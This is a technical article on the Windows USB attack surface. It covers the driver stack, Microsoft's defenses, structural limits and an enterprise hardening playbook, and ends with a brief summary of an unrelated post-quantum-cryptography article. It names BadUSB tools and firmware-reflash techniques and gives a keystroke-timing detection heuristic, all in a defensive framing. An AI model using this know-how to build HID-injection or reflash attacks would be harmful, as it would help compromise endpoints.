Note: Kernel DMA Protection is a Thunderbolt-and-PCIe-over-USB-C defense. It does not apply to USB 2.0 mass storage, HID, or audio. It does not apply to a USB 3.x flash drive talking the Mass Storage Class. It applies to PCIe peripherals tunneled over the same physical connector. If your threat model is "a malicious thumb drive types Mimikatz into my Start menu," KDP is not in your defense chain at all.

flowchart TD subgraph HC["Host controller layer"] XHCI["usbxhci.sys
USB 3.0 host controller driver"] UCX["Ucx01000.sys
USB host controller extension (KMDF)"] end subgraph Hub["Hub layer"] H["usbhub3.sys
USB 3.0 hub and enumeration"] end subgraph Comp["Composite split"] CCGP["usbccgp.sys
generic parent: one PDO per interface"] end subgraph Class["Class-driver layer"] HID["hidclass.sys + hidusb.sys
HID class"] STOR["usbstor.sys
Mass Storage Class"] AUDIO["usbaudio2.sys
Audio Class 2.0"] VIDEO["usbvideo.sys
USB Video Class (UVC)"] SER["usbser.sys
CDC Serial"] WIN["winusb.sys
Generic vendor access"] UCM["UcmCx / UcmUcsiCx / UcmTcpciCx
USB Type-C connector"] end XHCI --> UCX UCX --> H H --> CCGP CCGP --> HID CCGP --> STOR CCGP --> AUDIO CCGP --> VIDEO CCGP --> SER CCGP --> WIN CCGP --> UCM

Sources for the architecture diagram, layer by layer: [@ms-usb-3-0-stack] for the host-controller and hub layers (usbxhci.sys, Ucx01000.sys, usbhub3.sys); [@ms-ccgp] for the composite parent driver usbccgp.sys; [@ms-winusb] for winusb.sys; [@ms-typec] for the UCM class-extension family.

Key idea: Of the nine stages Windows executes between physical insertion and a class-driver attach, only two -- Stages 7 and 9 -- consult anything Windows holds as cryptographic truth. The other seven trust whatever the peripheral says, the moment the peripheral says it. KMCS certifies the driver, not the device. KDP certifies the bus, not the descriptor. The descriptor-trust gap is structural to USB; it lives in Stages 2 through 6, and no Windows-side defense has ever proposed to close it.

Nine stages. Two of them are the security model the article's reader thought was the security model. The other seven are descriptor parsing, ID synthesis, and INF search -- and they trust whatever the peripheral declares.

6. What Ships in Windows 11 24H2 / 25H2

Section 5 was the pipeline. This section is the roster: every Windows-11-shipping mechanism that defends the USB attack surface, what it actually does, and -- in the table at the end of this section -- what it does not.

The inbox class-driver roster. The class drivers that bind to a USB device after Stage 6 are mostly Microsoft-authored and ship in every Windows 11 SKU. They include hidclass.sys and hidusb.sys for keyboards, mice, joysticks, and HID-over-USB; usbstor.sys for the Mass Storage Class; usbprint.sys for the Printer Class; usbaudio2.sys for USB Audio Class 2.0; usbvideo.sys for the USB Video Class (webcams); usbser.sys for the CDC Serial class; winusb.sys for vendor-specific generic-access scenarios; the UcmCx.sys family for Type-C connector management; Hidi2c.sys for HID-over-I2C; and wpdusb.sys for MTP / PTP Windows Portable Devices [@ms-usb-3-0-stack] [@ms-typec] [@ms-winusb]. Every class driver in that list is signed under the Kernel-Mode Code Signing policy [@ms-kmcs]. Every class driver in that list trusts the descriptor that selected it.Hidi2c.sys is the sleeper attack surface on most laptops. Internal precision touchpads, fingerprint readers, and increasingly proximity sensors are HID-over-I2C devices wired to the chipset, not the external USB bus. They are not subject to USB-side Device Control policy because they are not USB devices; they are HID devices that happen to talk a different transport. The HID class definition is the same as it is on USB.

Kernel DMA Protection policy surface. KDP exposes three Group Policy values on DMAGuard\DeviceEnumerationPolicy: Block (the default; conservative posture), Allow with audit, and Allow all. The Microsoft Learn reference is verbatim about the default behavior: "By default, peripherals with DMA Remapping incompatible drivers are blocked from starting and performing DMA until an authorized user signs into the system or unlocks the screen" [@ms-kdp]. KDP's silicon and firmware prerequisites (IOMMU support, UEFI DMAR / IVRS publication) are non-trivial; on many post-2019 OEM platforms the toggle is shipping in BIOS but turned off until an administrator changes the firmware setting.

The ASR + Device Control + GPO triangle. The three deployable layers of enterprise USB policy on Windows 11 are an Attack Surface Reduction rule, the Microsoft Defender for Endpoint Device Control framework, and the older Group Policy Device Installation Restrictions family.

Attack Surface Reduction is a set of policy-defined kernel-and-userland rules in Microsoft Defender for Endpoint that block specific abusable behaviors. Each rule is identified by a GUID and toggled per-rule by Group Policy, Intune, or PowerShell. ASR rules sit in front of common execution sinks (Office child processes, script-from-email runs, USB-borne executables) and refuse the operation when the rule is in Block mode. They are a policy layer on top of the Windows execution model, not a re-design of it.

The ASR rule that targets USB-borne malware is "Block untrusted and unsigned processes that run from USB", GUID b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 on Microsoft's ASR-rule-to-GUID matrix [@ms-asr-rules]. (Several published guides cite the unrelated GUID d4f940ab-401b-4efc-aadc-ad5f3c50688a for the same rule; per the matrix that GUID is actually "Block all Office applications from creating child processes". The corrected USB GUID is the one to deploy.) Microsoft Defender for Endpoint Device Control is the granular layer: groups, rules, and settings let an administrator allow read-only-for-corporate-encrypted-USB, deny-write-for-personal-USB, allow corporate HID by VID/PID/serial, and a dozen other primitive combinations per-user [@ms-devcontrol]. The older Group Policy Device Installation Restrictions framework has eight policies (AllowedDeviceClasses, DenyDeviceClasses, AllowedDeviceIDs, DenyDeviceIDs, and so on) and uses Setup Class GUIDs such as GUID_DEVCLASS_USB ({36FC9E60-C465-11CF-8056-444553540000}) and GUID_DEVCLASS_HIDCLASS ({745A17A0-74D3-11D0-B6FE-00A0C90F57DA}) for class-wide rules [@ms-gpo-devinstall] [@ms-devsetupclasses].

BitLocker To Go. The full-volume-encryption story for removable media on Windows has been BitLocker To Go since Windows 7. On Windows 11 the default cipher is XTS-AES-128 (administrators can promote to XTS-AES-256 via the Group Policy "Choose drive encryption method and cipher strength" under Removable Data Drives), and the Group Policy "Deny write access to removable drives not protected by BitLocker" is the enterprise opt-in to force the contract [@ms-bitlocker]. BitLocker To Go protects the data on a USB stick if it is lost or stolen. It does not protect the host from a malicious peripheral, because the malicious peripheral does not present itself as a BitLocker-managed volume; it presents itself as whatever it pleases at Stage 5.

USB-IF Authentication Specification Revision 1.0. Published in the form of an ECN and errata dated January 7, 2019 [@usbif-auth-spec], this specification defines cryptographic peripheral identity using ECDSA P-256, X.509 certificate chains, and SHA-256 hashing -- the same primitives Windows already uses for KMCS and BitLocker. The standard exists. Windows ships no in-box consumer. No major host operating system in 2026 consumes it. The 2019 promise of cryptographic device identity has been seven years away for seven years.

Note: USB-IF Authentication 1.0 is the only mechanism in this entire roster that would architecturally close the BadUSB-class HID-injection problem. Every other defense in the table below mitigates the symptoms of the descriptor-trust gap. USB-IF Authentication would close the gap itself. It was published as an ECN seven years ago [@usbif-auth-spec]. Windows does not consume it. macOS does not consume it. Linux does not consume it. The defense is not absent because it is hard; it is absent because no host operating system has committed engineering to it. That is the institutional gap.

The SOTA roster, in a comparison table:

Mechanism	What it gates	Attack class addressed	Does NOT address
KMCS [@ms-kmcs]	Loading of unsigned `.sys` files into ring zero	Arbitrary kernel-mode driver loads	Descriptors a signed driver consumes
Kernel DMA Protection [@ms-kdp]	Pre-login + post-login DMA from Thunderbolt / USB4 PCIe endpoints	Thunderclap-class DMA attacks	USB 2.0/3.x storage and HID; pre-DMAR firmware platforms
ASR USB rule `b2b3f03d-...` [@ms-asr-rules]	Unsigned and untrusted process launch from USB-mounted volume	AutoRun-like execution; mass-storage-borne executables	HID-injection (no process is launched); descriptor-parser bugs
MDE Device Control [@ms-devcontrol]	Per-VID/PID/serial allow-deny on read, write, execute, file-walk	Any policy-named USB device class	Devices the policy explicitly allows
GPO Device Installation Restrictions [@ms-gpo-devinstall] [@ms-devsetupclasses]	Setup-class-wide allow-deny by Device Setup Class GUID	Whole-class blocks (e.g. all USB Storage)	Devices the policy allow-lists
BitLocker To Go [@ms-bitlocker]	Encryption of data at rest on removable USB volumes	Lost / stolen thumb drive	Malicious peripheral; host compromise
AutoRun-disable (KB971029 era) [@krebs-feb2011] [@wiki-autorun]	`autorun.inf`-driven AutoPlay launch on insert	Conficker-class AutoRun worms	HID injection; descriptor parser bugs
Driver Block List / Vulnerable Driver Block List [@ms-kmcs]	Loading of named known-bad signed `.sys` files	Bring-Your-Own-Vulnerable-Driver	New (unlisted) malicious-but-signed driver
USB-IF Authentication 1.0 [@usbif-auth-spec]	Cryptographic peripheral identity at enumeration	Descriptor-trust impossibility result (BadUSB)	(Standard exists; Windows does not consume it)

{` // Emulates the PowerShell check: // $p = Get-MpPreference // $p.AttackSurfaceReductionRules_Ids // $p.AttackSurfaceReductionRules_Actions // In a real Windows 11 enterprise rollout, run the PowerShell as administrator.

const USB_RULE_GUID = "b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4"; // "Block untrusted and unsigned processes from USB" const ACTION = { DISABLED: 0, BLOCK: 1, AUDIT: 2, WARN: 6 };

// Sample output that a healthy enterprise endpoint should produce. const sample = { ids: [USB_RULE_GUID, "d4f940ab-401b-4efc-aadc-ad5f3c50688a", "75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84"], actions: [ACTION.BLOCK, ACTION.BLOCK, ACTION.BLOCK], };

Eight Windows-shipping mechanisms, one missing implementation. The implementation gap is structural: the only complete defense in the roster is the one Windows does not ship.

7. USB Security on Non-Windows Platforms

Windows is not the only OS that inherits USB's descriptor-trust premise. Every host operating system since 1996 has inherited the same contract; each has staked out a different position on how to live with it. The contrast clarifies what Windows chose.

macOS on Apple Silicon (Ventura 2022, extended Sequoia 2024). Apple Support is verbatim on the prompt: "When you use a new or unknown USB accessory, Thunderbolt accessory, or SD card with your Mac laptop with Apple silicon, you get an alert that asks you to allow the accessory to connect" [@apple-mac-usb]. The same page documents the four user-selectable modes -- Always ask, Ask for new accessories, Automatically allow when unlocked, Always allow -- and the lockout window: "If your Mac has been locked for 3 or more days, you might need to unlock it to use a previously allowed accessory again" [@apple-mac-usb]. Apple is the only major host OS that ships a user-facing prompt as the default posture.Apple Silicon Macs enforce the accessory-prompt at the hardware level through the Secure Enclave Processor, not purely in software. This is architectural inference from Apple's general SEP-policy documentation; Apple Support pages describe the user-visible behavior, not the SEP-side enforcement chain. The architectural distinction matters because the prompt is not a kernel-side policy a privileged process can bypass.

iOS USB Restricted Mode (iOS 11.4.1, 2018; USB-C version, iOS 17+). Apple Support carries the iOS variant verbatim: "By default, you need to first unlock your iPhone or iPad to connect to an accessory or computer" [@apple-ios-usb]. Modern USB-C iPhones and iPads expose the same four-mode setting as the Mac: Always Ask, Ask for New Accessories, Automatically Allow When Unlocked, Always Allow [@apple-ios-usb]. iOS came first; macOS adopted the same UX pattern four years later.

ChromeOS. USB device authorization on ChromeOS is tied to the user-signin state; HID-class injection vectors are default-deny after suspend on managed devices. ChromeOS's documentation of the exact enforcement chain is sparse, so we will only describe what is publicly observable: the policy hooks exist, the enterprise-managed posture is default-deny, the consumer posture is default-allow.

Linux usbguard. The open-source usbguard daemon implements per-user, per-device USB authorization on top of the kernel's sysfs authorized flag [@usbguard]. The architectural cousin of Windows's Defender for Endpoint Device Control, usbguard ships a mature policy language (usbguard list-devices, usbguard allow-device, declarative rules.conf) and integrates cleanly with PolicyKit. The catch is that no major Linux distribution enables usbguard by default; it is opt-in software a sysadmin installs. Linux's kernel has had the authorized sysfs flag since 2007; what it has not had is a default-deny posture out of the box.

OpenBSD umass(4) / FreeBSD opt-in USB policy. The BSD family of operating systems ships conservative defaults: separated drivers per class, no autorun.inf-equivalent in the file manager, and a documented user-mode authorization story. Deployment scale is small; the design is included here only to illustrate that a default-deny posture is technically possible inside an inherited USB protocol contract.

The cross-platform comparison:

Platform	Default posture	Model	Pre-login HID injection	DMA isolation
Windows 11 25H2	Allow on insert	Policy frameworks layered over descriptor trust [@ms-asr-rules] [@ms-devcontrol] [@ms-gpo-devinstall]	Mitigated only by ASR USB rule + Device Control allow-list (enterprise opt-in)	Kernel DMA Protection on capable platforms [@ms-kdp]
macOS (Apple Silicon)	Prompt user	User-facing approval dialog, 3-day re-prompt window [@apple-mac-usb]	Mitigated by default prompt (consumer + enterprise)	Apple-managed IOMMU + SEP policy
iOS (USB-C)	Locked-until-unlock	User-facing approval dialog [@apple-ios-usb]	Mitigated by default prompt	Apple-managed IOMMU + SEP policy
ChromeOS (managed)	Default deny after suspend	Sign-in-state-gated authorization	Mitigated by default deny (managed devices)	Platform-IOMMU policy
Linux + usbguard	Default deny if installed	User-space daemon over kernel `authorized` flag [@usbguard]	Mitigated if `usbguard` installed (opt-in)	Distribution-dependent
Stock Linux	Allow on insert	Kernel `authorized` flag exists, default is allowed	Not mitigated	Distribution-dependent
OpenBSD / FreeBSD	Conservative by default	Per-class driver opt-in	Not the default attack surface (low deployment)	Limited

Two platforms (Apple's, both of them) prompt the user as the default posture. One (Linux) ships an opt-in user-space daemon. Windows is the only major platform that combines a kernel-mode device-control framework with cross-platform telemetry inside Microsoft Defender for Endpoint -- and the only one still relying entirely on enterprise opt-in for the HID-injection mitigation. The consumer default on Windows 11 25H2 is allow-on-insert.

8. What Windows Cannot Defend Against

We have walked the modern pipeline and seen the roster of defenses. We owe the reader a clean accounting of where the model is structural -- where no plausible Windows version closes the gap without breaking USB compatibility. There are five named limits, and none of them are bugs.

Limit 1: The descriptor-trust impossibility result. USB has, by specification, no out-of-band identity. A peripheral that declares itself to be a keyboard is a keyboard for purposes of the bus-enumeration handshake. The Wikipedia reference is explicit about the device-class architecture in which the peripheral, not the host, owns the declaration [@wiki-usb]. Until USB-IF Authentication (cryptographic device identity) is universal at the silicon level, this gap is structural to the protocol. Closing it on the host side -- by, say, refusing to bind a class driver until the device signs a challenge -- would break every existing USB device on the market.

Limit 2: HID-class trust is structural, not technical. A USB HID keyboard issues input events to the focused window. Windows has no way to know whether the user is the source of those events or whether a reprogrammed thumb drive is. The SR Labs disclosure is verbatim about why the host cannot tell the difference: the same Phison or Cypress controller chip that ships in a thumb drive can be reprogrammed to enumerate as a HID device with a vendor-controlled report descriptor [@srlabs-badusb-pdf] [@wiki-badusb]. Microsoft Defender for Endpoint Device Control supports granular HID rules, but they are opt-in, enterprise-only, and inherently break every external keyboard the policy does not allow. The structural cost of fixing this is breaking USB.

Limit 3: Firmware reprogrammability of commodity USB controllers. Phison, Cypress, Genesys, Realtek, and the rest of the commodity USB-controller market ship field-flashable firmware. The Psychson toolchain demonstrated the Phison PS2251-03 reflash end-to-end and made it reproducible in a researcher's afternoon: "firmware patches have only been tested against PS2251-03 firmware version 1.03.53 ... DriveCom ... EmbedPayload ... Injector" [@psychson-repo]. The O.MG Cable productionized the technique inside a USB-A-to-Lightning cable form factor, proving the attack is now commercial-supply-chain-implantable [@omg-cable]. The host operating system has no view into the controller's firmware, no way to attest it, and no way to reject a peripheral that exposes a different identity post-flash than it did pre-flash.

Limit 4: Kernel DMA Protection is opt-in at three layers. Silicon (the platform must have an IOMMU), firmware (the UEFI must publish DMAR / IVRS tables), and driver (the driver must declare DmaRemappingCompatible=1 in its INF) [@ms-kdp] [@ms-dmaremap]. Many post-2019 OEM platforms ship with the firmware toggle off in BIOS. Worse, the Thunderclap research demonstrated that even on IOMMU-enabled systems, shared IOMMU contexts between a peripheral and a kernel driver are a viable attack vector [@ndss-thunderclap]. KDP also has no view at all of USB 2.0/3.x mass storage or HID, which do not perform DMA.

Windows only uses the IOMMU in limited cases and remains vulnerable. -- Markettos, Rothwell, Gutstein, Pearce, Neumann, Moore, and Watson, *Thunderclap*, NDSS 2019 [@ndss-thunderclap]

Limit 5: The descriptor parser is C code in the kernel. usbhub3.sys and usbccgp.sys are partially undocumented, are closed-source, and parse adversarial input in a memory-unsafe language.Microsoft has not published the source for usbhub3.sys or usbccgp.sys; the architectural descriptions on Microsoft Learn describe the externally visible behavior of these drivers, not their internal parsing routines or memory-safety properties. Any claim about their specific implementation must be hedged accordingly. The conclusion that they parse adversarial input in C is inferred from the Windows-kernel codebase's language conventions and from the public record of descriptor-parser CVEs over the last fifteen years. Andy Davis named the surface in 2011 [@ncc-davis-2011], and Google's syzkaller-USB program -- a public-record proxy for the wider community's descriptor-parser fuzzing effort -- has been producing kernel-side descriptor-parser bugs across host operating systems since 2017 [@syzkaller-usb]. Until the parser is rewritten in a memory-safe language, this is finite-but-non-zero kernel-mode attack surface. Linux's usbcore has ongoing Rust experiments under the upstream Rust-for-Linux project [@rust-for-linux]; Windows has not publicly committed to a similar rewrite.

Note: None of these five limits is a Windows bug. The descriptor-trust gap is in USB. The HID-class trust gap is in the HID class definition. The firmware-reprogrammability gap is in commodity controller silicon. The KDP gap is in the layered opt-in posture of IOMMU-on-platform DMA isolation. The C-in-the-kernel gap is the price of Windows's compatibility-first kernel-driver model. Closing any one of them on the Windows side, in isolation, would either break the USB device market (limits 1-3), require commodity-silicon redesign (limit 3 again), or require a multi-year rewrite the engineering organization has not committed to (limit 5).

Key idea: The USB attack surface on Windows is the price Windows pays for being USB-compatible. Five named gaps. Zero of them are bugs. Each is a structural cost of inheriting a 1996 protocol contract written when peripheral firmware was not field-flashable and the descriptor-trust assumption was at least defensible. In 2026 the assumption is indefensible and the contract is everywhere. The defense Windows ships is the best layered mitigation anyone has built around the gap; it does not close the gap.

9. Open Problems

If the limits are structural, the open problems are sociological: who adopts the standard that already exists, who funds the rewrite that nobody has shipped, who builds the heuristic that no production OS has.

USB-IF Authentication 2.0 / 3.0 uptake. The standard exists as a January 2019 ECN [@usbif-auth-spec]. Device-vendor uptake is near zero outside specialized industries (automotive, medical). Windows has no in-box consumer. The blocker is not cryptographic feasibility -- ECDSA P-256 over SHA-256 with X.509 chains is everyday code -- it is two-sided market adoption: peripheral vendors will not ship the silicon until host operating systems consume it; host operating systems will not consume it until enough peripherals ship it. Someone in the duopoly of major host-OS shipping has to commit first. As of mid-2026 no one has. Current best partial result: the same ECDSA-plus-X.509 attestation pattern has been deployed at scale in adjacent ecosystems -- Apple's Find My accessory-attestation network and the automotive / medical USB-Authentication-mandatory tiers -- demonstrating that the cryptographic primitive itself is silicon-shippable; what remains is OS-side consumption.

HID re-enumeration detection. A thumb drive that mounts as Mass Storage, presents a benign-looking volume for a few seconds, and then re-enumerates as a composite device that adds a HID keyboard interface is the BadUSB signature [@srlabs-badusb-pdf]. No production host operating system detects this generically. A reasonable heuristic -- that a freshly enumerated device which changes its declared composition in the first fifteen seconds is suspicious -- is not in any Microsoft Defender for Endpoint hunting query as a shipped detection, only as a custom Defender XDR query an enterprise can compose itself. The heuristic is this article's own proposal, not a published primary source. Current best partial result: mature Microsoft Defender Experts customers are already deploying custom Defender XDR hunting queries that key on the post-attach composition-change pattern (typically joined against the BadUSB 200 ms keystroke-burst signature in §10.4); the detection exists in mature managed-detection-and-response practices but has not landed as a default rule in any shipping product.

USB-C Alternate Mode trust. DisplayPort Alt Mode, Thunderbolt Alt Mode, and USB4-tunneled PCIe each cross OS / firmware / silicon boundaries inside a single physical connector. The display-side firmware attack surface, the Power Delivery contract negotiation, and the "fast charge negotiation opens a data path" primitive that has emerged in commodity fast-charging hardware are all under-explored. Microsoft's Type-C UCM stack [@ms-typec] documents the connector-manager class extensions but does not (and cannot) verify the firmware behind the alt-mode peer. Current best partial result: the UCM UcmCx / UcmUcsiCx / UcmTcpciCx class-extension family ships in every Windows 11 SKU and gives the OS a uniform connector-state view it did not have before 2016 -- the partial mitigation is the architectural plumbing, not yet a firmware-attestation policy on top of it.

Supply-chain attacks on USB controller chips. The O.MG Cable shows that BadUSB is now manufacturing-implantable [@omg-cable]; the FBI's 2020 and 2022 FIN7 advisories show organized cybercriminal actors mailing the same primitive [@bleeping-fin7]. Hardware bill-of-materials attestation, Microsoft Defender for IoT inventory, and supply-chain risk-management frameworks (NIST SP 800-161 in the United States [@nist-sp-800-161]) are nascent on the consumer side and uneven on the enterprise side. Nothing on the consumer Windows endpoint defends the user from a cable that looks like a real cable. Current best partial result: the deployable enterprise stack is USB-IF Authentication 1.0 in the small set of authentication-capable peripherals [@usbif-auth-spec], plus Microsoft Defender for IoT device-inventory telemetry, plus per-organisation bring-your-own-cable allow-list policy primitives in Defender for Endpoint Device Control [@ms-devcontrol] -- a layered stack rather than a single defence.

Open-source memory-safe descriptor parser. Linux's usbcore has ongoing Rust experiments under the upstream Rust-for-Linux project [@rust-for-linux]; Microsoft has not committed to a similar rewrite. The bug-volume reduction from rewriting usbhub3.sys and usbccgp.sys in a memory-safe language would, on the basis of the public CVE record, dwarf any single mitigation in the article. The blocker is engineering scope, not technical feasibility. Current best partial result: the syzkaller-USB program has produced a continuously growing tally of kernel-side descriptor-parser bugs across host operating systems since 2017 [@syzkaller-usb], proving the attack surface is empirically large; the upstream Rust-for-Linux USB driver experiments are the only public evidence that a memory-safe rewrite of a production USB stack is practical at scale.

Note: "Vendor adoption" sounds like a feature-request line item rather than an open research problem. It is structural. Until a host OS commits silicon-supply-chain weight to USB-IF Authentication, the standards body has no influence on the peripheral vendors; until the peripheral vendors ship Authentication-capable silicon, the host OS sees no installed base to support. Solving the two-sided-market problem is the open problem -- not the cryptography.

The shortest path to closing the descriptor-trust gap runs through silicon (USB-IF Authentication), not through Windows. Until then, every defense in this article is layered around the gap, not on top of it.

10. A 2026 USB-Security Playbook for Windows IT

We have done the structural accounting. The reader who got this far is either a Windows internals engineer who wants the exact stack picture or an IT operator who needs to deploy something on Monday. The next four sub-sections are for that operator.

For end users

Do not plug in cables you did not buy. Do not use public USB charging stations. Brian Krebs reported the original juice-jacking demonstration verbatim in August 2011: "In the three and a half days of this year's DefCon, at least 360 attendees plugged their smartphones into the charging kiosk built by the same guys who run the infamous Wall of Sheep ... Brian Markus, president of Aires Security, said he and fellow researchers Joseph Mlodzianowski and Robert Rowley built the charging kiosk to educate attendees about the potential perils of juicing up at random power stations" [@krebs-juicejacking]. CISA's 2023 juice-jacking advisory and the FBI Denver Field Office's April 6, 2023 X.com warning trace their evidence base to the Aires Security demonstration and its lineage [@wiki-juicejacking]. If you must charge in public, use a USB data-blocker dongle (a passive accessory that breaks the data pins and passes only power).

For IT admins on Windows 11 Enterprise

Note: A minimal Windows 11 Enterprise USB-hardening baseline, in priority order: 1. Enable Kernel DMA Protection. Verify msinfo32 shows "Kernel DMA Protection: On". On firmware where the toggle is off, work with the OEM to turn it on in BIOS. Documentation: [@ms-kdp]. 2. Enable the ASR USB rule. Set GUID b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 to Block via Intune or Group Policy. Verify with (Get-MpPreference).AttackSurfaceReductionRules_Ids. Documentation: [@ms-asr-rules]. 3. Configure Defender for Endpoint Device Control. Default-deny Mass Storage. Allow corporate HID by VID/PID/serial allow-list. Documentation: [@ms-devcontrol]. 4. Configure BitLocker To Go. Group Policy: Deny write access to removable drives not protected by BitLocker. Documentation: [@ms-bitlocker]. 5. Configure GPO Device Installation Restrictions. Use AllowedDeviceClasses with explicit USB / HID setup-class GUIDs to constrain which device classes can be installed in the first place. Documentation: [@ms-gpo-devinstall] [@ms-devsetupclasses]. 6. Audit USB device installation. Pull Event ID 6416 (PnP device installed) into your SIEM. Compose a Defender XDR hunting query for rapid-keystroke bursts in the first 15 seconds after a USB attach as a BadUSB / FIN7-style HID-injection signature [@bleeping-fin7].

*Not capable* means one of three things: the platform lacks an IOMMU (Intel VT-d or AMD-Vi disabled in firmware), the UEFI is not publishing the DMAR / IVRS ACPI tables, or no DMA-Remapping-compatible driver is loaded for at least one externally exposed peripheral. First check `Intel VT-d` or `AMD IOMMU` in the BIOS setup screen and enable them. If they are already on, confirm in `msinfo32` that *DMA Protection: ACPI* is *On* (the firmware-tables check). If the firmware is on and KDP still says *Not capable*, the per-driver opt-in path is the gap: open Device Manager and look at the *Hardware ID* tab of each Thunderbolt or USB4 peripheral; a driver without the `DmaRemappingCompatible=1` directive in its INF will not be IOMMU-isolated and downgrades the system-wide posture. The Microsoft Learn reference walks through the per-driver opt-in [@ms-dmaremap].

For driver developers

Declare DmaRemappingCompatible=1 in your INF if your hardware tolerates IOMMU isolation; this is a one-line directive change with a system-wide security posture improvement [@ms-dmaremap]. Prefer the WDF USB Lower / Upper filter pattern over legacy WDM; the framework's lifecycle and PnP plumbing are correct by construction in ways that legacy WDM code is not [@ms-usb-3-0-stack]. Validate every descriptor byte in user-mode tooling before relying on usbhub3.sys to do so; if your device cannot survive its own validator, the descriptor parser surface is wider than it needs to be. If you are writing a vendor-specific function driver, prefer winusb.sys over a custom KMDF function driver where possible [@ms-winusb]; less kernel-mode code is unambiguously better.

For red team and blue team

The reproducible test devices are USB Rubber Ducky II + DuckyScript 3.0 [@hak5-shop-ducky] [@hak5-ducky-docs] and the O.MG Cable [@omg-cable]. For inspection, usbview.exe from the Windows SDK reads live descriptor trees out of usbhub3.sys and is the closest thing Windows has to a USB-side lsusb -v. For trace evidence, the ETW providers Microsoft-Windows-USB-USBHUB3 and Microsoft-Windows-USB-USBPORT (older stack) carry enumeration sequences with per-stage timing, documented end-to-end in Microsoft's USB Event Tracing for Windows reference [@ms-usb-etw]; wireshark + USBPcap reads the raw descriptor bytes if the kernel-side capture is permitted. For blue-team detection, the BadUSB signature is "first observed time-since-attach to first keystroke event is less than 200 ms"; legitimate human-driven keyboards do not type at that rate.

The playbook is layered defense. None of these controls closes the descriptor-trust gap; together they raise the cost enough that the BadUSB-class attacks the article opens with become attacker-uneconomical in a corporate context. The structural problem is still open.

11. Frequently Asked Questions

The reader has the model. These are the seven misconceptions the model corrects.

No. BitLocker To Go protects *the data on the stick* if you lose it. A reprogrammed thumb drive that re-enumerates as a HID keyboard is unaffected because BitLocker never sees it as a managed volume in the first place [@ms-bitlocker]. BitLocker is a confidentiality control for data at rest on a removable volume; the malicious-peripheral problem is a problem of *peripheral authentication*, which BitLocker is not in the threat model of. No. KDP blocks pre-login DMA from PCIe-class peripherals tunneled over Thunderbolt 3, Thunderbolt 4, or USB4 [@ms-kdp]. A USB 2.0 thumb drive performs no DMA at all, so KDP is not in its defense chain. KDP is a defense against a different attack class than BadUSB. They are complementary, not substitutable. No. Driver signing certifies that Microsoft (or a paid-up OEM signed under Microsoft's signing infrastructure) approved the driver *code* [@ms-kmcs] [@ms-drvsigning]. It does not certify the *descriptors* the driver consumes at runtime. The signed `hidclass.sys` will load happily and inject keystrokes for any HID-class device whose descriptor declares it to be a keyboard, including a reprogrammed thumb drive. KMCS is a defense of the kernel against malicious drivers, not a defense of the kernel against malicious peripherals presenting valid descriptors to honest drivers. The Aside in Section 5 walks this point in detail. No, it closed one vector. The 2011 KB971029-equivalent rollout disabled `autorun.inf`-driven AutoPlay execution by default [@krebs-feb2011] [@wiki-autorun]. That vector was the load-bearing one for the Conficker era. It did not affect HID injection (which Hak5 had already commercialized in 2010), it did not affect descriptor-parser bugs (which Andy Davis named at Black Hat 2011 [@ncc-davis-2011]), and it did not affect the LNK-icon attack class (which the same Patch Tuesday addressed separately [@nvd-cve-2010-2568]). Each closed vector was a single-bug closure that left adjacent vectors intact. Real. The cable is commercially available; the firmware is technically documented in the product's own materials [@omg-cable]; the same primitive (a USB cable with a WiFi-enabled implant) is now in the FBI's threat reporting on FIN7 mailed-USB campaigns [@bleeping-fin7]. On a stock Windows 11 25H2 endpoint, the O.MG Cable's HID-injection primitive works exactly as advertised unless explicit Microsoft Defender for Endpoint Device Control policy blocks the HID class for that VID/PID/serial [@ms-devcontrol]. It is not a movie trope. Not yet, and not by itself. The USB-IF Authentication Specification Revision 1.0 ECN dates from January 7, 2019 [@usbif-auth-spec]. The standard defines ECDSA P-256 over SHA-256 with X.509 chains -- everyday cryptography. The structural problem is two-sided market adoption: no host operating system (Windows, macOS, Linux, ChromeOS) consumes the standard in-box in 2026, and no major device-certification tier requires it. Until that loop closes, the standard's existence is necessary but not sufficient. Mostly, with significant cost. Disabling USB controllers at firmware time blocks every USB attack class because no descriptors are ever parsed. It also blocks every keyboard, every mouse, every security token, every licensed peripheral, every biometric reader, every printer that does not speak network protocols, and every legitimate file transfer onto and off of the endpoint. The cost is usually higher than the threat for general-purpose business endpoints, but the trade-off is a legitimate one for tightly scoped roles like air-gapped industrial-control workstations.

Plugging in a USB device is the single most-trusted action a user routinely performs on a Windows machine. Windows has done forty years of work to walk that trust back -- bit by bit, single-bug closure by single-bug closure, generation by generation. Some of that work is silicon-level (Kernel DMA Protection over IOMMU). Some of it is kernel-level (Kernel-Mode Code Signing chained to a Microsoft-trusted root). Some of it is application-level (Attack Surface Reduction, Device Control, AutoRun disablement, BitLocker To Go). None of it -- not one of the ten generations the article walks -- has touched the descriptor-trust premise itself. A peripheral's self-declared identity is still its identity at enumeration time, in 2026 as in 1996.

The next breakthrough on this stack will not come from Windows. It will come from USB-IF Authentication finally shipping in commodity peripheral silicon, and a host operating system committing to consume it in-box. That shipment has now been seven years away for seven years. When it arrives -- if it arrives -- the descriptor-trust gap closes, the BadUSB primitive becomes detectable in the bus enumeration handshake, and the eleven kernel-mode operations that begin at 10:42:17 each morning finally consult something the peripheral cannot fake. Until then, the gap is the gap, and the layered mitigations Windows ships are what stand between a Phison microcontroller and your domain administrator credentials.

Post-Quantum Cryptography on Windows: The Thirty-Year Migration That Just Arrived

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

**Post-quantum cryptography arrived on Windows in 2024-2026.** NIST finalised FIPS 203 (ML-KEM), FIPS 204 (ML-DSA), and FIPS 205 (SLH-DSA) on August 13, 2024 [@nist-fips-approved-news]. SymCrypt has shipped ML-KEM, ML-DSA, LMS, and composite-ML-KEM implementations across versions 103.5.0 through 103.11.0; CNG exposes them as `BCRYPT_MLKEM_ALG_HANDLE` and `BCRYPT_MLDSA_ALGORITHM`; Schannel can negotiate hybrid TLS 1.3 `X25519MLKEM768` (codepoint 0x11EC) on 24H2 behind Group Policy [@symcrypt-changelog, @cng-mlkem-examples, @draft-tls-ecdhe-mlkem]. The migration closes the harvest-now-decrypt-later channel for TLS-protected traffic, leaves the signed-binary persistence channel open, and is structurally constrained by the 4096-byte TPM 2.0 command buffer against which ML-DSA-87's 4595-byte signatures overflow [@fips-204-pdf, @wolfssl-wolftpm-v185].

